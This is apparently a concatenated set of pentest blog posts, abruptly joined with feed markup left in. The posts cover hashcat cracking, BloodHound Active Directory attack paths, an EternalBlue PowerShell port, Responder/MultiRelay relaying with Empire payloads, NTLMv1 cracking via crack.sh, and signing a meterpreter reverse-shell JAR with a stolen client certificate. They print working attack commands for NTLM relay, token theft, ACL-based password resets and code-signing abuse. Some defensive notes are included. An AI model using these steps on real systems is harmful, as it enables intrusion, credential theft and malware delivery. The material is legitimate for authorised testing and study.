Password cracking is a crucial part of a pentest. It can either lead you to the promised land, or stop you dead in your tracks. Password cracking is somewhat of an art, but there are some ways to make the process objectively better, so you can focus on more pwning. We'll discuss how you can take a budget build and turn it into an effective tool for your pentesting arsenal.

To effectively crack passwords, you need to focus on 3 things:

The Hardware

The Wordlists

The Rules

The Rig

Our day-to-day rig is a GPU powerhouse, but that's just not feasible for the hobbyist password cracker, and there are already plenty of great blog posts on building multi-thousand-dollar cracking rigs. No use beating a dead horse with another build blog.

However, for around $1200, you can build a decent rig around a single Nvidia GEFORCE GTX 1080 Ti.

The rest of the hardware doesn't need to be very special. This is what we recommend to build a rig on a budget:

Nvidia GEFORCE GTX 1080 Ti

This is going to be the most expensive piece of the rig at about $700.

250-500GB SSD

SSD increases wordlist read speed, and they're getting cheaper by the day. Splurge if you can.

Intel i5 or i7 CPU

You're not gaining much performance by going to the i7, but if you got a little extra $$, go for it.

16GB RAM

RAM is cheap, buy as much as you can afford and fit in your motherboard

The special-of-the-week motherboard and case combo from your favorite (local/online) hardware vendor

Your favorite Linux flavor, and a copy of hashcat

Depending on how frugal you are, the rig will probably cost about $1200-$1500. Keep in mind that $700 of that is the GPU alone. This isn't too bad considering it costs anywhere between $50 and $200 per day to run an AWS g2.8xlarge instance. Another nice benefit is that a single 1080 Ti performs faster than the AWS g2.8xlarge instance. So, it's an all-around win if you're currently using a hosted cracking instance. Nothing against using AWS; it's just a better investment to build your own rig if you're planning on using it frequently.

We used the budget build hardware to run our test cases, so that we could show how effective this rig can be with the right wordlists and rules.

Finding the Perfect Wordlists

After putting together the hardware we needed to focus on finding the right wordlists to bring our cracking rate up to an acceptable percentage.

When we started building a test case for this blog, our original goal was to have a 33% crack rate. We use Responder during internal pentests, so cracking 1 out of every 3 NTLM hashes almost guarantees us a path to domain admin. This was our starting goal. To test this, we gathered 40 NTLMv2 hashes from recent pentests.

After some Googling and a little bit of trial and error, we found our wordlists. Here are the top 3 performers, from publicly available wordlists:

Yes, there are others that are bigger, but in our test case these were most effective when considering the time to number of cracks ratio.

Weakpass 2.0

Weakpass 2.0 is a combination of several dumps and available wordlists. This wordlist is huge, weighing in at 28GB. Weakpass 2.0 had the highest standalone crack rate with 14 of the 40 hashes cracked. That's 35% right from the start.

It takes about 4 minutes to run through the weakpass 2.0 wordlist with (1) 1080 Ti. FYI, there's a bit of time taken to cache the wordlist when hashcat first starts. However, this is VERY dependent on the supporting hardware.

There is also a "Weakpass 2.0 A", but this wordlist isn't worth it in most cases:

"A" is 85GB compared to 2.0 at 28GB. Meaning it takes 3 times longer to run through.

"A" has a 66.88% crack rate according to their site, as opposed to a 65.16% crack rate with 2.0. Only a 1.72% difference in crack rate, with a 66% difference in size.

"A" contains 4-character passwords, while 2.0 only 5+ character passwords. 4-character passwords are not common for most organizations, and easy enough to brute force.

Stick with weakpass 2.0 for the best bang-for-your-buck. The time to crack rate ratio is better with 2.0.

Crackstation

Crackstation is another combination wordlist, weighing in at 15GB. This is a solid wordlist that had a standalone crack rate of 27.5% in our test case.

It only takes about 2 minutes to run through it, so it's worth giving it a shot. This wordlist is pretty stagnant, but it has been a solid performer for 2+ years now. We like it, it works, and you should check it out.

Rockyou

The RockYou wordlist is from the RockYou.com breach. It was the largest dump of plaintext passwords at the time, and has been a quick go-to for several years now. It comes default with Kali Linux and, compared to the others above, it's tiny, weighing in at only 139MB. It takes only (1) second to run through it; it takes longer to type out the actual command to run it… The initial crack rate is unimpressive, at 7.5% in our test case, but it runs so fast that it's worth a check.

Adding Rules for Better Results

Hashcat has the option to run "rules" against the wordlist, which mangle the words and create more possibilities for cracking. Hashcat comes packaged with several great rules. There are also some community generated rules that are quite useful as well, and most of these get incorporated to the hashcat master branch.
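For example, a hypothetical run against NetNTLMv2 hashes (-m 5600, the mode for Responder-captured NTLMv2) with a bundled rule; the rule path assumes hashcat's rules directory and may differ on your install:

hashcat -m 5600 hashes.txt weakpass_2.0.txt -r rules/hybrid/append_d.rule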

After a couple days' worth of running wordlist/rule combinations and a ton of waiting, we found the most effective rules for our test case:

Append_d: adds numbers to the end of a password, i.e. Password -> Password77

Append_s: adds special characters to the end of a password, i.e. Password -> Password!

Leetspeak: changes passwords to leetspeak, i.e. password -> p4$$w0rd

Append_d

Append_d is by far the most effective rule. It added an average of 10% more cracks to each wordlist it was paired with. We'll look at why that is, later in this post, when we analyze some cracked/dumped passwords.

Append_s

Append_s was also pretty effective, adding an average of 6% more cracks to each wordlist it was paired with. This number isn't jaw-dropping, but it could be the difference between pwning or complete frustration.

Leetspeak

The leetspeak rule is moderately effective, only adding about 2.5% more cracks to each wordlist it was paired with. However, those passwords have often been admins or service accounts in our recent experiences, so it's worth an extra run through the gauntlet.

Test case results

Here are the final results from our test case of 40 NTLMv2 hashes:

Analyzing Cracked Passwords

After cracking passwords from our pentests, we like to analyze the password profile to better understand how users generate passwords. To do this, I wrote a quick python script to read the passwords from a given file and spit out some percentages: https://github.com/dank-panda/password-analyzer.py (There is definitely work to be done here, but it'll give you some decent insight for now).

To start, we dump some passwords from a couple of recent pentests and run the script against them: python password-analyzer.py wordlist.txt

We see that 70% of the passwords we analyzed start with an uppercase letter. This isn't a really big surprise. It seems logical to capitalize the first letter, just like we all do for the beginning of a sentence. It's a common practice.

Next, we see that 61% of the passwords end in a number. This was a surprise to me. I thought that a special character would be the most common, but I was way off the mark on that assumption. It seems reasonable, though, given the amount of "Password1" passwords we see. Now we see why the append_d rule was so effective.

Another big surprise was that most of the passwords were 9+ characters, with 37% having 12 or more characters. This is outside of reasonable brute-force territory: brute forcing 12 characters with a single 1080 Ti would take a quick 168 BILLION years. Not an option… Kudos, unnamed clients.

Another thing we check for is the use of the company's name in passwords. From the looks of it, people are pretty good about not using their company name as their password. Another win for the users.

With this quick tidbit of data, we can start to see why the append_d rule adds an average of 10% more cracks. We can focus on identifying better rules and masks for future pentests with more data from dumped passwords, but for now it looks like we're on the right track.

Conclusion

With all the trial and error out of the way, you can now focus on creating a "crack plan" to help you more effectively utilize your cracking time. Our suggested methodology, based on our test case, is as follows (a scripted version follows the list):

Start with the rockyou wordlist

Run it by itself, then run through the append_d, append_s, and leetspeak rules

You can run through all 4 attempts in about 30 seconds total.

The crack rate is unexciting at 22% for all 4 attempts, but for 30 seconds of effort, it's WAY worth it.

Switch to the crackstation wordlist

Run it by itself, then run through the append_d, append_s, and leetspeak rules (in that order)

You can run through all 4 attempts in about 30 minutes. Not too bad for a 15 GB file

Crackstation, with these rules, had a 42.5% crack rate in our test case. That should be more than enough creds to get started, and the wait isn't unbearable.

End it with the Weakpass 2.0 wordlist to get those last few potential passwords

Run it by itself, then run through the append_d, append_s, and leetspeak rules (in that order)

You can run through all 4 attempts in about an hour

Weakpass 2.0 had a 57.5% crack rate in our test case.
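Scripted, the whole plan looks something like this (file names, hash mode, and rule paths are placeholders; map the rule names to wherever your local rule files live):

for wl in rockyou.txt crackstation.txt weakpass_2.0.txt; do
    hashcat -m 5600 hashes.txt "$wl"                 # each wordlist alone first
    for rule in append_d append_s leetspeak; do      # then the three rules, in order
        hashcat -m 5600 hashes.txt "$wl" -r "rules/${rule}.rule"
    done
done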

With a $1200 build and under 2 hours' worth of cracking effort, we cracked just under 60% of the hashes in our test case. We also know from our password analyzer script that these passwords are mostly 9+ characters, so they're not necessarily "weak" in terms of entropy. Overall, this build isn't out of reach for the hobbyist password cracker, and should provide an effective crack rate when used with strong wordlists and rules.

But if you still haven't gotten what you need by this point… you'll have to start trying more advanced techniques, which we'll save for another post.

When I came across the tool BloodHound, it quickly became one of the go-to tools in my arsenal. BloodHound has increased my speed and efficiency on most engagements and so I wanted to share what I've learned about the tool to help you get started with it. In this blog post, I'll take you through how to get started with BloodHound and how to use it to map and own Active Directory environments.

History

BloodHound was inspired by a need for an offensive dashboard that graphically represents Active Directory domain escalation attack paths. BloodHound was developed by Rohan Vazarkar, Andrew Robbins, and Will Schroeder and released during DEF CON 24. It was built on several existing toolsets and conceptual models: PowerView, Graph Theory, Derivative local admin theory, Dijkstra's Algorithm, and PowerPath.

BloodHound quickly enumerates group membership information and user privileges and compiles them to an easy-to-understand GUI. An offensive practitioner can visualize attack paths based on these relationships and find the quickest path of attack for any account, group, or computer in the domain. With limited time on each engagement, being able to quickly map relationships and locate viable attack paths can help pentesters utilize their time more effectively.

Up and Running with BloodHound

On the surface, BloodHound is relatively intuitive. The clean web interface, with the inclusion of several default queries, is simple enough to understand without extensive research or experience. However, this does not imply BloodHound lacks depth.

PowerShell Ingestor

Once you have established a foothold on the network, you can import the PowerShell ingestor for BloodHound to collect data about trusts, users, and all other object relationships in an Active Directory environment. BloodHound uses a modified version of PowerView to collect data. We can use either the BloodHound Empire Module or another C2 framework for data collection.

Empire

The PowerShell ingestor, BloodHound.ps1, implements the Invoke-BloodHound function for collecting and exporting data.

1. Select the module: powershell/situational_awareness/network/bloodhound
2. Set the appropriate download location
3. Run the module: CSVs are exported to the defined location

CSV files are written to the current directory.

Uploading and Querying

Once you have exported the data to CSV, download the files and upload them to BloodHound.

Alternatively, you can export the data directly to the Neo4j REST API using the -URI and -UserPass arguments, as described in the BloodHound GitHub wiki.
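For example (host and credentials are placeholders):

Invoke-BloodHound -URI http://localhost:7474 -UserPass "neo4j:neo4jpassword"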

Querying

The example below displays the query "Find Top 10 users with the Most Admins".

BloodHound also includes custom node selection, where a specified source and target node are selected for attack path mapping. Perhaps you would like to skip finding a path to domain admin and would rather move straight to a database or the domain controller itself.

You can select the compromised object as a start node and the target machine as an end node.

Cypher

BloodHound uses Neo4j as its graph database. Neo4j interactions are driven by "Cypher". Cypher was inspired by SQL and was developed as a declarative graph query language for describing patterns in graphs visually. BloodHound comes pre-built with several "Cypher" queries; however, you can create your own to meet your specific needs.

The built-in queries are good enough for a penetration tester to achieve success on most engagements without developing additional custom Cypher queries. This, plus the requirement to learn Cypher, results in custom queries being frequently ignored. However, learning even just a bit of Cypher can prove to be well worth the effort, as custom queries are a powerful feature of BloodHound.
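For instance, a minimal custom query asking for the shortest path from a given user to the Domain Admins group; the node names follow this post's PTEST.LOCAL lab convention:

MATCH (u:User {name:'TEST1@PTEST.LOCAL'}),
      (g:Group {name:'DOMAIN ADMINS@PTEST.LOCAL'}),
      p = shortestPath((u)-[*1..]->(g))
RETURN p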

Common terms from Graph theory are directly applicable to the Neo4j Graph Database, such as edges and nodes. In the context of BloodHound, a node represents either a User, Group, Computer, or Domain. Each node represents an object that can be acted upon when moving through an Active Directory Environment.

Edges represent relationships between nodes. In the context of BloodHound, edges include MemberOf, AdminTo, HasSession, and TrustedBy. Version 1.3 of BloodHound introduced a new set of edges for access control entries. These include ForceChangePassword, AddMembers, GenericAll, GenericWrite, WriteOwner, WriteDACL, and AllExtendedRights. Together, edges and nodes create the paths that we use in BloodHound.

BloodHound applied

The following example is a simple use-case for BloodHound in which we use a theoretically compromised user as a start point; identifying the strategic lateral movements required to help us pivot through the network. Our target is the Domain Administrator account. We've selected a compromised account as the start point and the Domain Administrator account as our target node.

1. In the example above, we have compromised the user TEST1@PTEST.LOCAL after acquiring valid user credentials via Responder or through an exploit.

2. This user has administrative access to both TESTHOST.PTEST.local and TESTHOST2.PTEST.local, indicated by the "AdminTo" relationships.

3. Theoretically, we can use the MSF module "psexec_psh" to gain an active session on either TESTHOST.PTEST.local or TESTHOST2.PTEST.local.

4. BloodHound indicates both machines have an active session with the user SMARAR@PTEST.local.

5. With the active session on TESTHOST.PTEST.LOCAL, we can enumerate processes and the owner of each process, looking for a process owned by the user with the active session. If we find one, we can steal the token from that process with "steal_token PID" (e.g. "steal_token 694") and impersonate the selected user. Alternatively, credential dumping on the host can yield:

   - Cleartext passwords
   - SAM hashes

6. Analyzing the attack path, we can see our target user has administrative access to DC-01.PTEST.LOCAL, which is our target. If we wish to verify this, we can use "ls \\DC-01\C$"; listing the C$ share succeeds only with valid administrative access. With the user having administrative access to this machine, we can use this user for our attack path.

7. BloodHound indicates SMARAR@PTEST.LOCAL has a session with DC-01.PTEST.LOCAL. We identify this by the "HasSession" relationship between the user and the identified machine.

8. Using SMARAR@PTEST.LOCAL, we can psexec_psh into DC-01.PTEST.LOCAL. Once we have established a session on the system, we again have multiple options to compromise the administrator account and achieve our goal: using Mimikatz, Lazykatz, or token theft, we can gain access to the user ADMINISTRATOR@PTEST.local. Once we've completed this step, we have successfully compromised the Domain Administrator account.

ACL Attack Paths

Version 1.3 of BloodHound introduced an exciting new feature which gives an attacker more options to exploit different Active Directory objects. Version 1.3 includes new edge types based on Active Directory object control. The update adds several new edges based on object permissions that BloodHound flags as abusable. ACL-based attack paths identify exploitable access control entries (ACEs) within discretionary access control lists (DACLs).

DACLs

Active Directory has several common securable objects which contain security descriptors. These security descriptors contain DACLs which hold Access Control Entries. Common objects include users, groups, and computers which correlate to the nodes in BloodHound.

In the example below, you can see the DACL and individual ACEs for the user smarar.

An object can have different access rights to another object. For example, Domain Admins usually have full control over user accounts within the domain. Alternatively, an authenticated user perhaps only has read access to certain information about the user. As an attacker, we are interested in understanding how we can leverage these access rights to gain control over objects of interest to get us closer to our goal.

DACLs in BloodHound

Version 1.3 of BloodHound includes an "ACLs" collection method for the Invoke-BloodHound PowerShell ingestor, which collects object-to-object permissions in an AD environment:

Invoke-BloodHound -CollectionMethod ACLs

When we upload the data to BloodHound we can see the new edge types displayed.

In the example above we can see two new edge types of object to object permissions:

GenericAll: Full object control, including the ability to add other principals to a group, change a user password without knowing its current value, register an SPN with a user object, etc. Abused with Set-DomainUserPassword or Add-DomainGroupMember cmdlets.

WriteDACL: The ability to write a new ACE to the target object's DACL. For example, an attacker may write a new ACE to the target object's DACL giving the attacker "full control" of the target object. Abused with Add-NewADObjectAccessControlEntry. ("BloodHound 1.3 – The ACL Attack Path Update," wald0.com)

These are just two examples of the new edges; others include ForceChangePassword, AddMembers, GenericWrite, WriteOwner, and AllExtendedRights.
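As a rough sketch of abusing a GenericAll edge with the PowerView functions named above (the account names and password here are illustrative placeholders):

$pass = ConvertTo-SecureString 'Winter2018!' -AsPlainText -Force
Set-DomainUserPassword -Identity smarar -AccountPassword $pass
# Or, if the edge targets a group rather than a user:
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'test1'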

When BloodHound creates an attack path against Active Directory using ACLs, it will likely use more than one type of permission. Exploiting these permissions can be invasive and fairly easy to detect. If an attacker leverages the 'GenericAll' permission to change a password, for example, and that user is then unable to log in, this could alert the user to your presence.

Will Schroeder (harmj0y) and Lee Christensen (tifkin_) created a whole suite of new PowerShell functions to exploit each ACE. These functions have not been committed to the master branch yet, so you will need to grab the PowerView.ps1 script from the dev branch if you want to try them out.

Upload the script to Empire and take a crack at some of these awesome cmdlets.

You can check that you have done this correctly by verifying the new cmdlets exist. Note: many of these modules are still in development and may not work correctly out of the box with Empire.
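From an Empire agent, loading the script and checking for one of the new functions might look like this (the agent name and script path are illustrative):

(Empire: AGENT) > scriptimport /opt/PowerView.ps1
(Empire: AGENT) > scriptcmd Get-Command Set-DomainUserPassword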


A Blue Team Perspective

Risk Auditing

Auditing Active Directory against best practices and properly maintaining an effective AD security posture is a complex and challenging topic that is vital to an organization's overall security. An AD environment should be assessed frequently to ensure a secure architecture and alignment with business goals.
An organization must be able to answer questions including, but not limited to: Who has what level of privileged access in our AD environment? Who can create or delete objects? Who can reset passwords and modify group memberships?

BloodHound is a viable tool for performing risk audits of an Active Directory environment. The same attack paths used by an attacker can be identified and remediated by a defensive practitioner, who can use BloodHound to easily visualize object privileges and relationships. The addition of ACL attack paths in version 1.3 also opened far more opportunities to identify risk beyond simple group membership and active session information: defensive practitioners can audit security descriptors by enumerating DACL entries, giving deeper insight into specific object permissions.

After running BloodHound against your own environment, you can identify risks in object memberships, effective permissions, GPOs, or DACL entry misconfigurations. An organization should carefully audit these policies and ensure an appropriate architecture for their organization that enforces least privilege and a tiered administrative model. This will ensure that even if an attacker has mapped the environment, there will be limited and monitored viable attack paths.

Detection and Mitigation

But what can we do in the way of active defense? When BloodHound is used for reconnaissance against our environment, what can a defensive practitioner do to detect and mitigate it? BloodHound is nearly invisible, so understanding how it works at its core is essential to detecting it.

BloodHound's core components are data ingestion and visualization. As mentioned previously, BloodHound's collector is a specialized version of PowerView. PowerView only needs PowerShell version 2.0 to run, so it works on default configurations of Windows 7 and later.

The collection methods PowerView uses to enumerate AD information do not require special permissions and can be run by regular users on the network. Enumeration is done using LDAP via ADSI. Since there is traditionally no logging for these queries, detecting BloodHound is that much more difficult.

The traffic sent to the domain controller over port 389 is unremarkable on its own, and traditional event logging would not give us any events in this situation.

So, what does BloodHound traffic look like? Watching Wireshark while BloodHound runs, we can see that it generates high volumes of LDAP traffic. An option for defensive practitioners is to monitor for this high volume of LDAP traffic and enable a rule to log it.

Network administrators can enable a rule that logs high volumes of LDAP traffic and LDAP sessions that run longer than typical. It is best to baseline your network traffic first, then observe the changes while running BloodHound.
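One way to eyeball LDAP conversation volume while baselining is a capture summary along these lines (the interface and duration are illustrative):

tshark -i eth0 -f 'tcp port 389' -a duration:300 -q -z conv,tcp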

Wrapping Up

With limited time to analyze each unique Active Directory environment, its trusts, relationships, and objects, BloodHound can mean the difference between hours of effort and owning an environment in a matter of a few steps. The reduced overhead and complexity in AD analysis alone are enough to make BloodHound a must-have tool in any penetration tester's toolbelt.

BloodHound continues to receive new features, and its developers are continuously researching ways to create stealthier attack paths. Be sure to check out the ACL attack path update; future updates should include exploitable GPO edges.

As pentesters, our job is to demonstrate the risk that unpatched vulnerabilities pose to the business. This past month, that has largely been an exercise in demonstrating the risk of the EternalBlue vulnerability. To do this, it is key that we, the good guys, possess the same tools and capabilities as the bad guys.

The team over at RiskSense has played a key role in providing this capability to the community by reverse engineering EternalBlue and developing the MS17-010 Metasploit module: https://github.com/RiskSense-Ops/MS17-010. This community-developed exploit has allowed us, and other pentest teams, to successfully demonstrate the risk of MS17-010 to many organizations.

There are some situations, however, where running a Metasploit module may not be feasible. For example, on many of our red team engagements, we have access to the network only through Empire agents. These agents do not allow port forwarding, and there is not always an easy way to forward traffic from a Metasploit instance to the targeted servers. We could, of course, use a Meterpreter shell or Cobalt Strike agent on those servers, but this is not always feasible or desired given the stealth profile we are trying to achieve.

We ran into several situations where we could have gotten domain admin, or other significantly privileged access, had we been able to run EternalBlue, but were unable to due to some combination of the above reasons. Internally, we called this the 'Eternal Blues' and decided we needed to do something about it.

Because EternalBlue is such a useful exploit for red teams now and into the near future, we developed a PowerShell port of RiskSense-Ops' Metasploit module. The port is 100% PowerShell and can easily be imported and used in Empire or Cobalt Strike shells.
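As a hypothetical sketch of running such a port from an Empire agent (the script and function names here are placeholders for illustration, not the actual names in the repository):

(Empire: AGENT) > scriptimport ./eternalblue.ps1
(Empire: AGENT) > scriptcmd Invoke-EternalBlue -Target 10.0.0.30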

This PowerShell port allowed us to better demonstrate the risk of MS17-010 and cured our blues. We hope it has the same effect for you.


Responder is a go-to tool for most pentesters. We use it quite often on pentests to quickly gain access to a client’s domain. However, when clients enforce strong password policies and their users don’t choose passwords like 'Ilovemykids2017!', we are forced to resort to using masks and brute force to crack these hashes. Given the time constraints of some of our pentests, this is not an effective option. Thankfully Laurent Gaffie developed MultiRelay to help us out with this:

MultiRelay is a module in Responder that allows targeted attacks using NTLMv1 and NTLMv2 relay. MultiRelay takes advantage of commonly misconfigured Windows environments that do not enforce SMB signing. When signing is not enforced, neither the client nor the server validates the other party or the payload being executed. This makes SMB man-in-the-middle attacks possible, which means shells for us!

MultiRelay+Empire = Pwnage

Now for the good stuff, having MultiRelay pop shells for you! First, we need to stage our attack environment by configuring Responder and creating an Empire listener.

We start off by editing our Responder configuration to disable SMB and HTTP servers:

nano /usr/share/responder/Responder.conf

Change the SMB and HTTP settings to 'OFF' and save the file.
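The relevant lines should end up looking something like this (key names as in recent Responder versions):

[Responder Core]
SMB = Off
HTTP = Off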

Start Responder on the local network adapter and give it the NetBIOS redirect and verbose flags.
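For example (the interface name will vary by system):

./Responder.py -I eth0 -rv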

Ensure that the SMB and HTTP servers are 'OFF' as Responder is starting:

Next, we create our Empire listener:
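In Empire 2.x syntax, something like the following (the listener name and host are illustrative):

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name multirelay
(Empire: listeners/http) > set Host http://10.0.0.5:8080
(Empire: listeners/http) > execute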

Note: The default settings will work for our lab environment, but you'll want to configure these options to fit your needs.

Create a PowerShell one-liner for an Empire agent:
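Empire's launcher command generates this for a given listener:

(Empire: listeners) > launcher powershell multirelay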

This one-liner is plugged into MultiRelay as our payload to execute when we successfully relay an NTLM hash:
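Something like the following, where the target IP and the Base64 launcher blob are illustrative placeholders:

python MultiRelay.py -t 10.0.0.40 -u ALL -c "powershell -noP -sta -w 1 -enc <BASE64_LAUNCHER>"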

Note: during a pentest, this is where we sit back and wait for a triggering event to execute our payload. This can take a while in certain environments, but on busy Windows networks it's usually only a few minutes before someone comes along and makes your day!

We’ll move the process along by attempting to access a share, so Responder can trigger the payload:

Once we attempt to access a share, Responder immediately gets to work poisoning traffic to the requesting host:

Simultaneously, MultiRelay is setting up an SMB challenge to capture an NTLM hash for relaying:

After the requesting host replies to the SMB server with an NTLM hash, MultiRelay relays that hash to the target along with our payload:

Then we’re greeted with a nice little prompt telling us things went right:

From here we can perform all our post exploitation activities in Empire, like establishing persistence, running Mimikatz, enumerating directories, and so on. And there you have it, domain pwnage without cracking passwords!

Things to Note

The users targeted in MultiRelay with the -u flag must be local administrators on the target host. This usually isn't a problem in most Windows environments, but using 'ALL' will let you know whether the user triggering the event has sufficient privileges.

The payload for the -c flag can be changed to whatever you want, such as a Cobalt Strike beacon, a meterpreter shell, or just a Windows shell command. It’s up to you.

NTLM relay attacks have been around since 2001!! This method can be used to quickly exploit this legacy vulnerability and, given the right circumstances, can take an attacker from 0 access to domain admin in a matter of minutes.

For pentesters: SMB signing kills this legacy vulnerability dead in the water. MultiRelay will tell you if signing is enabled so you can choose a different target; don’t waste your time on targets that have signing enabled.

For admins: SMB Signing kills this legacy vulnerability, dead in the water. Enforce it as much as possible!

Although enforcing SMB signing stops NTLM relay attacks, it can at times come with negatives:

Certain printers do not support SMB signing, resulting in the inability to print.

Major decreases in SMB performance are common when large files are transferred or many users access the same server simultaneously.

This post will show how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. This technique has been publicized since 2013, but is often not leveraged by testers.

Intro

For most pentesters, running Responder.py is one of the first tasks performed on internal penetration tests. The tool spoofs multicast name resolution queries and hands the pentester NTLMv1 and NTLMv2 handshakes. The next step is usually to attempt to crack those handshakes, at a minimum by running them against a wordlist such as CrackStation's.

An NTLMv1 handshake, however, offers another, usually ignored cracking option that is guaranteed to give the tester the NTLM hash. Unlike the NTLMv1 handshake, the NTLM hash can be used as a password equivalent in a Windows environment.
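Once recovered, the NTLM hash can be passed directly to authenticate; for example, with CrackMapExec (the host and hash placeholder are illustrative):

crackmapexec smb 10.0.0.10 -u Administrator -H <NTLM_HASH>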

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56-bit DES (and a third round using only 2 bytes of the keyspace), which Moxie Marlinspike demonstrated could be cracked by modern FPGAs (https://www.youtube.com/watch?v=sIidzPntdCM).

You can use the crack.sh site to extract the NTLM hash from any MS-CHAP or NTLMv1 handshake for 20 bucks. The site doesn't take the challenge/response displayed in Responder directly; instead, you need to convert it to a token.

The script below can be used to convert the Responder output to a token that will be accepted by crack.sh.
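The original script isn't reproduced here, but a minimal Python sketch along the same lines, assuming Responder's usual user::DOMAIN:LMresp:NTresp:challenge output and crack.sh's $NETNTLM$ token format, would be:

#!/usr/bin/env python
# Convert Responder NTLMv1 lines (user::DOMAIN:LMresp:NTresp:challenge)
# into $NETNTLM$<challenge>$<response> tokens for crack.sh.
import sys

def to_token(line):
    parts = line.strip().split(":")
    if len(parts) < 6:
        raise ValueError("unexpected Responder format: %r" % line)
    nt_response = parts[4]   # 48 hex chars of NTLMv1 response
    challenge = parts[5]     # 16 hex chars of server challenge
    return "$NETNTLM$%s$%s" % (challenge, nt_response)

if __name__ == "__main__":
    for line in sys.stdin:
        if line.strip():
            print(to_token(line))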

These malicious .jar files were used in a successful social engineering campaign against the client.

These typically overlooked, but easily mitigated vulnerabilities quickly turned into a path to full compromise. We won’t go into much detail about the steps taken after the initial compromise. We’ll save that for another blog.

Now for the fun stuff…

Apache Mod_Status

Apache mod_status is an Apache module that allows administrators to view quick status information by navigating to the /server-status page, e.g. https://www.apache.org/server-status. This isn't necessarily a vulnerability on its own, but when enabled in public-facing production environments it can provide attackers a treasure trove of useful information, especially when the ExtendedStatus option is configured.

During the OSINT phase of an engagement, we incorporate a series of Google dorks, including a search for enabled mod_status:

site:<site> inurl:"server-status" intext:"Apache Server Status for"

Alternatively, given a range of IPs instead of a URL, you can use a Bash "for" loop to check for /server-status pages. A representative sketch (the original loop isn't shown, and the range here is illustrative):
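for ip in 10.0.0.{1..254}; do
  curl -sk --max-time 3 "http://$ip/server-status" | grep -q "Apache Server Status" && echo "$ip: mod_status enabled"
done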

However, the loop above queries each server directly, making it NOT OpSec friendly. Use it with caution if stealth is key on an engagement.

So why do we dork for server-status? Because among the valuable information disclosed, such as server version, uptime, and process information, the ExtendedStatus option displays recent HTTP requests to the server. If recent requests contain authorization information, such as tokens, you can see why this page would be valuable to an attacker.

In many cases this dork doesn't come back with any results, but in this scenario we found several systems with both mod_status and ExtendedStatus enabled. What made this even more interesting was that several HTTP requests had been made for files with .jar extensions:

A quick test, using wget, shows this page is accessible without authenticating, and we grab the rt.jar file for further examination.
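For example, with the host and path as placeholders:

wget "http://<target>/<path>/rt.jar"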

We wanted to examine all the JARs, so with a quick curl we were able to list all requests containing the .jar extension:
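Something along these lines (the host is a placeholder):

curl -s "http://<target>/server-status" | grep -oE '[^ "]+\.jar' | sort -u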

You could also navigate to the page and click each link to download the files, but we were operating from a C2 server with no GUI, so Bash plus wget was necessary.

Java Static Values

After downloading the JARs locally for examination, we used a Java decompiler to examine the code. Our preference is JD-GUI (https://github.com/java-decompiler/jd-gui), but there are plenty of other decompilers out there.

After examining the files, it quickly became apparent that several static values were used in the JARs, including passwords, UIDs, and local paths. The biggest finding, however, was the Keystore password found in the POM.xml file located in the print.jar applet:

A Java Keystore is used to store authorization or encryption certificates for Java applications, typically giving an applet the ability to authenticate to a service or encrypt traffic over HTTPS.

The XML file in the screenshot above provided the Keystore name, alias, and password; all we needed to find the Keystore. Luckily, the Keystore was stored in the rt.jar file that was also accessible without authentication, and already in our possession.

We simply unzipped the rt.jar file to extract the AppletSigningKeystore2016.jks file:

unzip rt.jar

Using the hardcoded Keystore password we discovered in the print.jar applet, we could decrypt the Keystore and export the code signing certificate.
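With the alias and password from POM.xml, the export looks something like this (the alias is a placeholder):

keytool -exportcert -keystore AppletSigningKeystore2016.jks -alias <alias> -file cert.der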

Using OpenSSL, we converted the certificate to a human-readable .crt format:

openssl x509 -inform der -in cert.der -out cert.crt

Further digging into the discovered JARs indicated that the client used the certificate in the Keystore to sign other applets.

Creating Signed Malicious JARs

After determining the AppletSigningKeystore2016.jks Keystore contained the client’s code signing certificate, we shifted our efforts to creating a Java payload with a reverse shell. The payload we used was tailored to the client, but here’s an example of using msfvenom to create a simple JAR file with an embedded meterpreter shell:
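(The LHOST/LPORT values below are illustrative.)

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f jar -o payload.jar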

Using the jarsigner utility provided with Java's JDK, we were then able to sign the payload with the AppletSigningKeystore2016.jks Keystore, which contained the client's code signing certificate:

jarsigner -keystore AppletSigningKeystore2016.jks /payload.jar JAR

This made it appear as if the client created the application themselves, thus increasing the likelihood that a user would execute the file and give us a shell:

Wrap-up

So now we had a functioning payload, signed by the client, ready to use against their users. All it took was a little effort during the recon phase, attention to detail, and a tiny bit of Java knowledge. In many cases it's easy to overlook what would normally be considered a minor vulnerability, but in this case, not overlooking these tiny details led to full compromise of the client's network.

We won’t go into any details about the social engineering campaign, because all it takes is one user to click a link or run an executable, and it becomes an internal pentest. Let’s just say we got a few shells.

]]>Recently on a pentest, we encountered a web application that allowed us to control command line args sent to the 'java' binary on the underlying server. We didn't see any resources published on how to gain arbitrary command execution with just control of the arguments to java, so this blog]]>https://threat.tevora.com/quick-tip-gaining-code-execution-with-injection-on-java-args/cbfd0df7-e718-4d32-95fd-3520c207d1edFri, 16 Dec 2016 18:18:00 GMTRecently on a pentest, we encountered a web application that allowed us to control command line args sent to the 'java' binary on the underlying server. We didn't see any resources published on how to gain arbitrary command execution with just control of the arguments to java, so this blog will demonstrate how you could easily go about this.

About separating commands from data

Most experienced developers will avoid using OS-level commands in their web applications, but when it is necessary, they will use a library that lets them specify the binary separately from user-defined input and prevents shell or control characters from being interpreted. This style of command execution usually has a function signature similar to exec() or fork().
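As an illustrative sketch (not from the original post) using Python's subprocess API, the difference looks like this:

import subprocess

# exec()-style: the binary is fixed by the application, and user input only
# ever becomes a single argv element, so shell metacharacters are not
# interpreted.
user_arg = "-Dcolor=blue; rm -rf /tmp/x"      # hostile input
subprocess.run(["/usr/bin/java", user_arg])   # the ';' stays inside one argument

# shell-style: the full string is parsed by a shell, so the same input now
# injects a second command.
subprocess.run("/usr/bin/java " + user_arg, shell=True)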

You can imagine that an OS command may take some user-defined elements from web app input, while the binary being executed is defined by the application itself. A web app might hard-code the binary but allow user input to define the arguments. In most cases this stops an attacker from easily injecting commands with only control of the arguments: they cannot simply use bash/bat control characters, and controlling the arguments does not give them control of which binary is executed.